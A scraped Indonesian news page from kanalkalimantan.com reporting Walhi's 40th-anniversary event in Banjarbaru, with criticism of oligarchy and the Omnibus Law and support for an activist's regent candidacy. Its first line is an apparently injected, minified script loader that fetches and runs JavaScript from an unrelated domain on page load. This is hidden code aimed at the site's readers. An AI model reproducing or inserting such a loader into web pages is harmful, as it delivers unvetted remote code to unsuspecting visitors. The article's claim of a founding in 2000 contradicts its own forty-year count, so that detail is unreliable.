(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Kalimantan Selatan

Refleksi 40 Tahun Walhi, Pilih Kepala Daerah yang Pro Keadilan Rakyat dan Lingkungan


KANALKALIMANTAN.COM, BANJARBARU – Wahana Lingkungan Hidup Indonesia (Walhi) genap berusia 40 tahun, sejak awal dibentuk 15 Okrober 2000 silam.

Selama 4 dekade Walhi bersama gerakan masyarakat sipil di Indonesia menghadapi situasi yang belum pernah dihadapi sebelumnya. Reformasi yang lahir pada tahun 1998 sebagai akumulasi dari gerakan rakyat 22 tahun yang lalu, juga perlahan-lahan mengalami kemunduran dan kini bahkan kembali seperti pada masa orde baru.

Risma Umar, Ketua Dewan Nasional Walhi mempertegas, saat ini cengkraman oligarki ekonomi-politik semakin menguat di hampir semua sendi kehidupan bernegara. Kekuatan ekonomi kapitalistik-neoliberal dengan mulusnya masuk ke dalam sistem politik di Indonesia, hal ini ditandai dengan hampir separuh anggota legistlatif ditingkat nasional merupakan pelaku bisnis.

“Sistem pemilu dikuasai oleh kaum pemodal dan menjadikan gedung-gedung parlemen sebagai tempat persekongkolan kekuatan modal dan kekuatan politik untuk menelurkan kebijakan-kebijakan yang mampu mengumpulkan sebanyak mungkin keuntungan bisnis bagi para pemodal,” beber Risma Umar.

Bukan hanya itu, persekongkolan parlemen dengan pemerintah oligarkis terus menerus menggerus hak-hak dasar warga negara untuk hidup layak dan bermartabat, yang sebenarnya telah dijamin oleh konstitusi UUD 1945.

“Contoh konkrit yang masih hangat diperbincangkan adalah UU Cipta Kerja (Omnibus Law) yang baru disahkan, juga melalui proses yang menurut Walhi dilakukan secara ugal-ugalan oleh eksekutif dan legislatif dan merupakan produk regulasi yang paling buruk dalam sejarah Indonesia,” tegas Risma Umar yang selama kurang lebih 8 tahun menjadi Dewan Nasional Walhi.

Sementara itu, Kisworo Dwi Cahyono, Direktur Eksekutif Walhi Kalsel mengajak warga Banua untuk berpartisipasi dalam kontestasi Pilkada tahun ini dengan memilih pasangan calon kepala daerah yang pro terhadap keadilan rakyat dan lingkungan.

“Semua harus mengambil peran karena keberhasilan perjuangan adalah kerja kolektif. Walhi tidak bisa sendiri,” tegasnya saat membuka perayaan 40 tahun Walhi di kantor Walhi Kalsel, Kamis (15/10/2020) kemarin.

“Itulah sebabnya Walhi selama 4 dekade perjuangan terus membuka diri kepada siapapun yang ingin memperbaiki bumi ini. Terima kasih atas dukungan dan juga kritikan yang selama ini diberikan untuk Walhi Kalsel,” tambah Kisworo.

Langkah nyata ditempuh oleh Walhi Kalsel dengan mendukung salah satu kader terbaiknya untuk berkiprah di dunia politik, yaitu Berry Nahdian Furqan yang tahun ini menjadi salah satu calon Bupati Kabupaten Hulu Sungai Tengah (HST).

“Saya masih aktivis Walhi, hanya saja ranah perjuangan yang kini berbeda. Ketika dulu saya ada di jalanan, hari ini saya berjuang melalui organisasi politik,” ujar Berry yang hadir dalam sesi diskusi bertajuk Refleksi 40 Tahun Walhi.

Menurutnya, perlu ada gerakan di parlemen untuk mewujudkan Indonesia bersih. “Ini adalah pilihan peran bagi saya, sebagai upaya membangun sinergi kolaborasi dalam berjuang,” ucap Direktur Eksekutif Nasional Walhi periode 2012-2014 ini.

Di momen 40 tahun Walhi, Berry berharap Walhi dengan gerakan yang makin besar bisa semakin menguatkan diri di jalan perjuangan untuk tercapainya keadilan ekologis.

Perayaan 40 tahun Walhi yang berlangsung sederhana itu juga dihadiri mitra pedampingan Walhi Kalsel yaitu Forum Pedagang Kaki Lima Murjani (Forkamu) dan petani Sukamaju. Walhi Kalsel terus memperjuangkan keadilan bersama mereka. Selain itu hadir pula anggota jaringan dari mahasiswa serta anggota individu. (kanalkalimantan.com/rico)

Reporter : Rico
Editor : Bie

Al Ghifari

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

4 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

5 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

5 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

5 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

5 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

6 jam ago

This website uses cookies.